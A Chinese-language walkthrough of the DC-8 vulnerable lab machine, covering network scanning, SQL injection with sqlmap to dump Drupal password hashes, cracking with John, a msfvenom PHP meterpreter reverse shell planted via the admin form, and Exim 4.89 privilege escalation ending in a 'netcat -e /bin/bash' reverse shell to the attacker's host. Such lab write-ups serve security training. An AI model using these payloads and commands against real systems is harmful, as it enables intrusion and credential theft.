下载地址:点我

哔哩哔哩:点我

信息收集

  • 确定网段,找到虚拟机的IP,扫端口和服务。
➜  ~ nmap -sn 192.168.116.1/24

Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-21 22:21 CST

Nmap scan report for 192.168.116.1

Host is up (0.00075s latency).

Nmap scan report for 192.168.116.135

Host is up (0.00038s latency).

Nmap done: 256 IP addresses (2 hosts up) scanned in 5.16 seconds

➜  ~ nmap -A -T4 192.168.116.135 -p-

Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-21 22:21 CST

Nmap scan report for 192.168.116.135

Host is up (0.0063s latency).

Not shown: 65533 closed ports

PORT   STATE SERVICE VERSION

22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)

| ssh-hostkey:

|   2048 35:a7:e6:c4:a8:3c:63:1d:e1:c0:ca:a3:66:bc:88:bf (RSA)

|   256 ab:ef:9f:69:ac:ea:54:c6:8c:61:55:49:0a:e7:aa:d9 (ECDSA)

|_  256 7a:b2:c6:87:ec:93:76:d4:ea:59:4b:1b:c6:e8:73:f2 (ED25519)

80/tcp open  http    Apache httpd

|_http-generator: Drupal 7 (http://drupal.org)

| http-robots.txt: 36 disallowed entries (15 shown)

| /includes/ /misc/ /modules/ /profiles/ /scripts/

| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt

| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt

|_/LICENSE.txt /MAINTAINERS.txt

|_http-server-header: Apache

|_http-title: Welcome to DC-8 | DC-8

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 10.68 seconds

➜  ~
  • IP为:192.168.116.135,发现开放了ssh和http服务,Drupal 7,nmap也扫出了robots.txt文件,信息有点多,http://192.168.116.135/robots.txt,php文件有下面几个:
Disallow: /cron.php

Disallow: /install.php

Disallow: /update.php

Disallow: /xmlrpc.php
  • URL格式好像是路由的有下面几个:
Disallow: /admin/

Disallow: /comment/reply/

Disallow: /filter/tips/

Disallow: /node/add/

Disallow: /search/

Disallow: /user/register/

Disallow: /user/password/

Disallow: /user/login/

Disallow: /user/logout/

Disallow: /?q=admin/

Disallow: /?q=comment/reply/

Disallow: /?q=filter/tips/

Disallow: /?q=node/add/

Disallow: /?q=search/

Disallow: /?q=user/password/

Disallow: /?q=user/register/

Disallow: /?q=user/login/

Disallow: /?q=user/logout/
  • Drupal 7.67, 2019-05-08 版本还比较新,http://192.168.116.135/CHANGELOG.txt,扫过没发现什么东西。
➜  ~ droopescan scan drupal -u 192.168.116.135

[+] Plugins found:

    ctools http://192.168.116.135/sites/all/modules/ctools/

        http://192.168.116.135/sites/all/modules/ctools/LICENSE.txt

        http://192.168.116.135/sites/all/modules/ctools/API.txt

    views http://192.168.116.135/sites/all/modules/views/

        http://192.168.116.135/sites/all/modules/views/README.txt

        http://192.168.116.135/sites/all/modules/views/LICENSE.txt

    webform http://192.168.116.135/sites/all/modules/webform/

        http://192.168.116.135/sites/all/modules/webform/LICENSE.txt

    ckeditor http://192.168.116.135/sites/all/modules/ckeditor/

        http://192.168.116.135/sites/all/modules/ckeditor/CHANGELOG.txt

        http://192.168.116.135/sites/all/modules/ckeditor/README.txt

        http://192.168.116.135/sites/all/modules/ckeditor/LICENSE.txt

    better_formats http://192.168.116.135/sites/all/modules/better_formats/

        http://192.168.116.135/sites/all/modules/better_formats/README.txt

        http://192.168.116.135/sites/all/modules/better_formats/LICENSE.txt

    image http://192.168.116.135/modules/image/

    profile http://192.168.116.135/modules/profile/

    php http://192.168.116.135/modules/php/

[+] Themes found:

    seven http://192.168.116.135/themes/seven/

    garland http://192.168.116.135/themes/garland/

[+] Possible version(s):

    7.67

[+] Possible interesting urls found:

    Default changelog file - http://192.168.116.135/CHANGELOG.txt

    Default admin - http://192.168.116.135/user/login

[+] Scan finished (0:00:42.200148 elapsed)

➜  ~
  • 突然加一个单引号报错了,发现一个SQL注入,http://192.168.116.135/?nid=1%27
PDOException: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1: SELECT title FROM node WHERE nid = 1'; Array ( ) in mypages_init() (line 6 of /var/www/html/sites/all/modules/mypages/mypages.module).

漏洞利用

  • 丢进sqlmap跑。
➜  ~ sqlmap -u "http://192.168.116.135/?nid=1" --batch

        ___

       __H__

 ___ ___[(]_____ ___ ___  {1.3.8#stable}

|_ -| . [)]     | .'| . |

|___|_  [,]_|_|_|__,|  _|

      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 00:07:13 /2019-09-22/

[00:07:13] [INFO] testing connection to the target URL

[00:07:13] [INFO] checking if the target is protected by some kind of WAF/IPS

[00:07:13] [INFO] testing if the target URL content is stable

[00:07:13] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'

how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C

[00:07:13] [INFO] testing if GET parameter 'nid' is dynamic

[00:07:13] [WARNING] GET parameter 'nid' does not appear to be dynamic

[00:07:13] [INFO] heuristic (basic) test shows that GET parameter 'nid' might be injectable (possible DBMS: 'MySQL')

[00:07:14] [INFO] heuristic (XSS) test shows that GET parameter 'nid' might be vulnerable to cross-site scripting (XSS) attacks

[00:07:14] [INFO] testing for SQL injection on GET parameter 'nid'

it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y

[00:07:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'

[00:07:14] [WARNING] reflective value(s) found and filtering out

[00:07:14] [INFO] GET parameter 'nid' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Status message")

[00:07:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'

[00:07:14] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'

[00:07:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'

[00:07:14] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'

[00:07:14] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'

[00:07:14] [WARNING] potential permission problems detected ('command denied')

[00:07:14] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'

[00:07:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'

[00:07:14] [INFO] GET parameter 'nid' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable

[00:07:14] [INFO] testing 'MySQL inline queries'

[00:07:14] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'

[00:07:14] [WARNING] time-based comparison requires larger statistical model, please wait.............. (done)

[00:07:15] [INFO] testing 'MySQL > 5.0.11 stacked queries'

[00:07:15] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'

[00:07:15] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'

[00:07:15] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'

[00:07:15] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'

[00:07:15] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'

[00:07:25] [INFO] GET parameter 'nid' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable

[00:07:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'

[00:07:25] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found

[00:07:25] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test

[00:07:25] [INFO] target URL appears to have 1 column in query

[00:07:25] [INFO] GET parameter 'nid' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable

GET parameter 'nid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N

sqlmap identified the following injection point(s) with a total of 47 HTTP(s) requests:

---

Parameter: nid (GET)

    Type: boolean-based blind

    Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: nid=1 AND 7434=7434

    Type: error-based

    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)

    Payload: nid=1 AND (SELECT 5822 FROM(SELECT COUNT(*),CONCAT(0x716b767871,(SELECT (ELT(5822=5822,1))),0x7178717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

    Payload: nid=1 AND (SELECT 6066 FROM (SELECT(SLEEP(5)))jOuH)

    Type: UNION query

    Title: Generic UNION query (NULL) - 1 column

    Payload: nid=-9086 UNION ALL SELECT CONCAT(0x716b767871,0x635349446c7871725473696250696f6e57684163546277736a706a416479444c736e424d6669744e,0x7178717671)-- KIcF

---

[00:07:25] [INFO] the back-end DBMS is MySQL

web application technology: Apache

back-end DBMS: MySQL >= 5.0

[00:07:25] [WARNING] HTTP error codes detected during run:

500 (Internal Server Error) - 23 times

[00:07:25] [INFO] fetched data logged to text files under '/home/kali-team/.sqlmap/output/192.168.116.135'

[*] ending @ 00:07:25 /2019-09-22/
  • 找到邮箱和密码dump出来
➜  ~ sqlmap -u "http://192.168.116.135/?nid=1" --batch -D d7db -T users -C name,mail,pass --dump

        ___

       __H__

 ___ ___[.]_____ ___ ___  {1.3.8#stable}

|_ -| . [(]     | .'| . |

|___|_  [.]_|_|_|__,|  _|

      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 08:52:00 /2019-09-22/

[08:52:00] [INFO] resuming back-end DBMS 'mysql'

[08:52:00] [INFO] testing connection to the target URL

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: nid (GET)

    Type: boolean-based blind

    Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: nid=1 AND 7434=7434

    Type: error-based

    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)

    Payload: nid=1 AND (SELECT 5822 FROM(SELECT COUNT(*),CONCAT(0x716b767871,(SELECT (ELT(5822=5822,1))),0x7178717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

    Payload: nid=1 AND (SELECT 6066 FROM (SELECT(SLEEP(5)))jOuH)

    Type: UNION query

    Title: Generic UNION query (NULL) - 1 column

    Payload: nid=-9086 UNION ALL SELECT CONCAT(0x716b767871,0x635349446c7871725473696250696f6e57684163546277736a706a416479444c736e424d6669744e,0x7178717671)-- KIcF

---

[08:52:00] [INFO] the back-end DBMS is MySQL

web application technology: Apache

back-end DBMS: MySQL >= 5.0

[08:52:00] [INFO] fetching entries of column(s) 'mail, name, pass' for table 'users' in database 'd7db'

[08:52:00] [INFO] used SQL query returns 3 entries

[08:52:00] [INFO] retrieved: '','',''

[08:52:00] [INFO] retrieved: 'dcau-user@outlook.com','admin','$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z'

[08:52:00] [INFO] retrieved: 'john@blahsdfsfd.org','john','$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF'

Database: d7db

Table: users

[2 entries]

+-------+-----------------------+---------------------------------------------------------+

| name  | mail                  | pass                                                    |

+-------+-----------------------+---------------------------------------------------------+

| admin | dcau-user@outlook.com | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z |

| john  | john@blahsdfsfd.org   | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF |

+-------+-----------------------+---------------------------------------------------------+

[08:52:00] [INFO] table 'd7db.users' dumped to CSV file '/home/kali-team/.sqlmap/output/192.168.116.135/dump/d7db/users.csv'

[08:52:00] [INFO] fetched data logged to text files under '/home/kali-team/.sqlmap/output/192.168.116.135'

[*] ending @ 08:52:00 /2019-09-22/

➜  ~

破解密码

  • 不知道Hash是什么算法的可以用HashID测试一下,https://hashcat.net/wiki/doku.php?id=example_hashes,也可以在这搜索一下特征。当然是Drupal自写的算法。
➜  ~ cat hash.txt

$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z

$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

➜  ~ hashid hash.txt

--File 'hash.txt'--

Analyzing '$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z'

[+] Drupal > v7.x

Analyzing '$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF'

[+] Drupal > v7.x

--End of file 'hash.txt'--%                                                                                            ➜  ~
  • 用John破解发现有一个密码破解成功了,john:turtle
➜  ~ john hash.txt --show

john@blahsdfsfd.org:turtle

1 password hash cracked, 1 left

➜  ~

上传木马

  • 刚刚在robots.txt找到的登录页面,http://192.168.116.135/?q=user/login/,进到后台修改配置项Contact Us的Form settings,把Text format 的选项改为PHP Code。
  • 生成php的后门。
➜  ~ msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.116.1 LPORT=7788 -o shell.php

[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload

[-] No arch selected, selecting arch: php from the payload

No encoder or badchars specified, outputting raw payload

Payload size: 30656 bytes

Saved as: shell.php

➜  ~
  • 把php后门复制到Confirmation message里,开启MSF监听端口,保存后到联系页面提交评论。
msf5 exploit(multi/handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description

   ----  ---------------  --------  -----------

Payload options (php/meterpreter_reverse_tcp):

   Name   Current Setting  Required  Description

   ----   ---------------  --------  -----------

   LHOST  192.168.116.1    yes       The listen address (an interface may be specified)

   LPORT  7788             yes       The listen port

Exploit target:

   Id  Name

   --  ----

   0   Wildcard Target

msf5 exploit(multi/handler) > run 

[*] Started reverse TCP handler on 192.168.116.1:7788

[*] Meterpreter session 3 opened (192.168.116.1:7788 -> 192.168.116.135:45166) at 2019-09-22 09:12:05 +0800

meterpreter >

提升权限

  • 查找有SUID的文件,套路和前面的都一样。
meterpreter > shell

Process 1087 created.

Channel 0 created.

bash

python -c 'import pty;pty.spawn("/bin/bash")'

www-data@dc-8:/var/www/html$ find / -perm -u=s -type f 2>/dev/null

find / -perm -u=s -type f 2>/dev/null

/usr/bin/chfn

/usr/bin/gpasswd

/usr/bin/chsh

/usr/bin/passwd

/usr/bin/sudo

/usr/bin/newgrp

/usr/sbin/exim4

/usr/lib/openssh/ssh-keysign

/usr/lib/eject/dmcrypt-get-device

/usr/lib/dbus-1.0/dbus-daemon-launch-helper

/bin/ping

/bin/su

/bin/umount

/bin/mount

www-data@dc-8:/var/www/html$
  • 发现了一个/usr/sbin/exim4,在正常情况很少这种情况,所以出题人故意的。查看版本是:4.89
www-data@dc-8:/var/www/html$ exim4 --version

exim4 --version

Exim version 4.89 #2 built 14-Jun-2017 05:03:07

Copyright (c) University of Cambridge, 1995 - 2017

(c) The Exim Maintainers and contributors in ACKNOWLEDGMENTS file, 2007 - 2017

Berkeley DB: Berkeley DB 5.3.28: (September  9, 2013)

Support for: crypteq iconv() IPv6 GnuTLS move_frozen_messages DKIM DNSSEC Event OCSP PRDR SOCKS TCP_Fast_Open

Lookups (built-in): lsearch wildlsearch nwildlsearch iplsearch cdb dbm dbmjz dbmnz dnsdb dsearch nis nis0 passwd

Authenticators: cram_md5 plaintext

Routers: accept dnslookup ipliteral manualroute queryprogram redirect

Transports: appendfile/maildir/mailstore autoreply lmtp pipe smtp

Fixed never_users: 0

Configure owner: 0:0

Size of off_t: 8

Configuration file is /var/lib/exim4/config.autogenerated
  • 提权exp:https://www.exploit-db.com/exploits/46996
➜  ~ searchsploit exim 4.8

------------------------------------------------------------------------------ ----------------------------------------

 Exploit Title                                                                |  Path

                                                                              | (/usr/share/exploitdb/)

------------------------------------------------------------------------------ ----------------------------------------

Exim 4.84-3 - Local Privilege Escalation                                      | exploits/linux/local/39535.sh

Exim 4.87 - 4.91 - Local Privilege Escalation                                 | exploits/linux/local/46996.sh

Exim 4.87 / 4.91 - Local Privilege Escalation (Metasploit)                    | exploits/linux/local/47307.rb

Exim 4.87 < 4.91 - (Local / Remote) Command Execution                         | exploits/linux/remote/46974.txt

Exim 4.89 - 'BDAT' Denial of Service                                          | exploits/multiple/dos/43184.txt

Exim < 4.86.2 - Local Privilege Escalation                                    | exploits/linux/local/39549.txt

Exim ESMTP 4.80 - glibc gethostbyname Denial of Service                       | exploits/linux/dos/35951.py

------------------------------------------------------------------------------ ----------------------------------------

Shellcodes: No Result

➜  ~
  • 本地权限提升的有两个到4.91版本以下,一个是MSF的,还有一个是sh脚本的。MSF那个试了,不知道为什么利用不了。文档
msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > show options 

Module options (exploit/linux/local/exim4_deliver_message_priv_esc):

   Name      Current Setting  Required  Description

   ----      ---------------  --------  -----------

   EXIMPORT  25               yes       The port exim is listening to

   SESSION   3                yes       The session to run this module on.

Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description

   ----   ---------------  --------  -----------

   LHOST  192.168.116.1    yes       The listen address (an interface may be specified)

   LPORT  13371            yes       The listen port

Exploit target:

   Id  Name

   --  ----

   0   Exim 4.87 - 4.91

msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > run 

[!] SESSION may not be compatible with this module.

[*] Started reverse TCP handler on 192.168.116.1:13371

[*] Payload sent, wait a few seconds...

[-] Exploit aborted due to failure: unknown: Couldn't escalate privileges

[*] Exploit completed, but no session was created.

msf5 exploit(linux/local/exim4_deliver_message_priv_esc) >
  • 知道为什么可以教我一下哦,接下来还是用sh版的吧。这里有一个坑,直接上传searchsploit会出现
bash: ./46996.sh: /bin/bash^M: bad interpreter: No such file or directory

www-data@dc-8:/tmp$ ./46996.sh

./46996.sh

bash: ./46996.sh: /bin/bash^M: bad interpreter: No such file or directory

www-data@dc-8:/tmp$ sed -i -e 's/\r$//' 46996.sh
  • 上网查了是文件的格式不对,把结束符替换就可以了。
$ ./46996.sh -m netcat

./46996.sh -m netcat

raptor_exim_wiz - "The Return of the WIZard" LPE exploit

Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>

Delivering netcat payload...

220 dc-8 ESMTP Exim 4.89 Sun, 22 Sep 2019 21:03:24 +1000

250 dc-8 Hello localhost [::1]

250 OK

250 Accepted

354 Enter message, ending with "." on a line by itself

250 OK id=1iBzeG-0000Ui-8O

221 dc-8 closing connection

Waiting 5 seconds...

localhost [127.0.0.1] 31337 (?) open

netcat -e /bin/bash 192.168.116.1 2333

netcat -e /bin/bash 192.168.116.1 2333
  • 在本机用netcat监听端口2333,当虚拟机执行提权监本后出现open后输入netcat -e /bin/bash 192.168.116.1 2333,就能拿到Root权限了。
➜  ~ netcat -nlvp 2333

Connection from 192.168.116.135:33958

id

uid=0(root) gid=113(Debian-exim) groups=113(Debian-exim)

获取Flag

忘记了

DC: 8-Write-up的更多相关文章

  1. 怎么搭建DC+SCCM 域环境(一)

    需要的软件: 1. SCCM 2012 SP1 2. SQL Server 2012 3. System ISO 4. ADK 环境搭建顺序: 1. 安装DC和SCCM 机器,并配置需要的IP.DNS ...

  2. LDAP 中 CN, OU, DC 的含义

    1. LDAP的存储规则 区分名(DN,Distinguished Name) 和自然界中的树不同,文件系统/LDAP/电话号码簿目录的每一片枝叶都至少有一个独一无二的属性,这一属性可以帮助我们来区别 ...

  3. [专业名词·硬件] 2、DC\DC、LDO电源稳压基本常识(包含基本原理、高效率模块设计、常见问题、基于nRF51822电源管理模块分析等)·长文

    综述先看这里 第一节的1.1简单介绍了DC/DC是什么: 第二节是关于DC/DC的常见的疑问答疑,非常实用: 第三节是针对nRF51822这款芯片电源管理部分的DC/DC.LDO.1.8的详细分析,对 ...

  4. AD域服务器|两台DC无法进行复制同步

    注:本文由Colin撰写,版权所有!转载请注明原文地址,谢谢合作! 说明:前段时间公司两台域控出现了一些问题导致数据无法相互进行同步,DC之间也无法进行共享访问,网络用户无法通过计算机名映射的共享访问 ...

  5. DC/DC与LDO的差别

    转自:http://bbs.eetop.cn/thread-459121-1-1.html 在平时的学习中,我们都有接触LDO和DC/DC这一类的电源产品,但作为学生的我们队这些东西可能了解不够深刻, ...

  6. 游戏贴图中常用术语《DC》的理解

    什么是DC呢? 在GDI中,DC(Device Context)是一个非常重要的概念. 有的书中,将DC翻译为设备描述表,也有的书中翻译为设备上下文. 但是这些翻译,无法在我们的头脑里有强烈的冲击,无 ...

  7. com.apache.dc.query.Query所属包名apache-common-sid.jar

    com.apache.dc.query.Query所属包名apache-common-sid.jar 首先这个类是基于HQL的,好多方法里面要传String clzz, 刚开始我真不知道这个参数传什么 ...

  8. 深入解析DC/OS 1.8 – 高可靠的微服务及大数据管理平台

    深入解析DC/OS 1.8 – 高可靠的微服务及大数据管理平台 大家好,欢迎大家参加这次DC/OS的技术分享. 先做个自我介绍,刘超,Linker Networks首席架构师,Open DC/OS社区 ...

  9. BZOJ4026: dC Loves Number Theory

    Description  dC 在秒了BZOJ 上所有的数论题后,感觉萌萌哒,想出了这么一道水题,来拯救日益枯 竭的水题资源.    给定一个长度为 n的正整数序列A,有q次询问,每次询问一段区间内所 ...

  10. 神奇的计算器dc和bc

    神奇的计算器dc和bc Linux就这个范儿 P244http://baike.baidu.com/link?url=YlTtivBfc1tfzreeUQoe8D0C6yqwbZGqnmlObq1hj ...

随机推荐

  1. Ubuntu系统备份还原教程

    一.备份 很多人有备份系统的习惯,以防系统挂.Windows下可以用DISM创建一个系统镜像,在Ubuntu下,我们可以使用squashfs-tools创建系统镜像. 准备工作 可启动LiveCD一份 ...

  2. HTML5学习(7)多媒体元素

    视频元素video <video src="./media/xxx.mp4" controls autoplay muted loop></video> 音 ...

  3. 任意模数 n 次剩余

    \(n\) 次剩余 你需要解方程 \(x^n\equiv k\pmod m\),其中 \(x\in [0,m-1]\). 保证解数不超过 \(C=10^6\) \(1\le n,m,k\le 10^9 ...

  4. jmeter实现服务器端后台接口性能测试

    实现目的 在进行服务器端后台接口性能测试时,需要连接到Linux服务器端,然后通过命令调用socket接口,这个过程就需要用到jmeter的SSH Command取样器实现了. 脚本实现 设置CSV ...

  5. aarch64架构下安装tensorflow详细过程

    本人使用的是: EAIDK-610开发板,Redhat的Linux系统,arm64架构,python3.6环境. 重要的: 一定要下载符合自己环境架构相同的tensorflow安装包. 三种架构: x ...

  6. 03hive_DDL数据定义

    一. DDL数据定义 创建数据库 1)create database db_hive; 2)避免要创建的数据库已经存在错误,增加 if not exists 判断. create database i ...

  7. getter和setter

    /* 对象属性是由名字.值和自足特性构成的. 属性值可以用一个或两个方法替代,这两个方法就是getter和setter. 由getter和setter定义的属性称作“存取器属性” */ /* 定义存取 ...

  8. 微信小程序GET 400 (Bad Request)解决方案

    解决了接口的问题,接下来就是请求不正确,得不到数值 400 (Bad Request) 可以用这个方法:wx.request传入的对象参数中的head改一下 wx.request({ header: ...

  9. IIS 部署 web service

    1.在控制台检查 IIS 功能是否已经全部启用 2.重新注册IIS 3.设定程序池的正确版本

  10. 《JavaScript高级程序设计》读书笔记(三)基本概念第五小节流程控制语句

    内容---语法 ---数据类型 上一小节---流程控制语句 本小节---理解函数 语句--ECMA-262规定了一组语句,也称流程控制语句 if语句-- 条件可以是任意表达式,-- ECMAScrip ...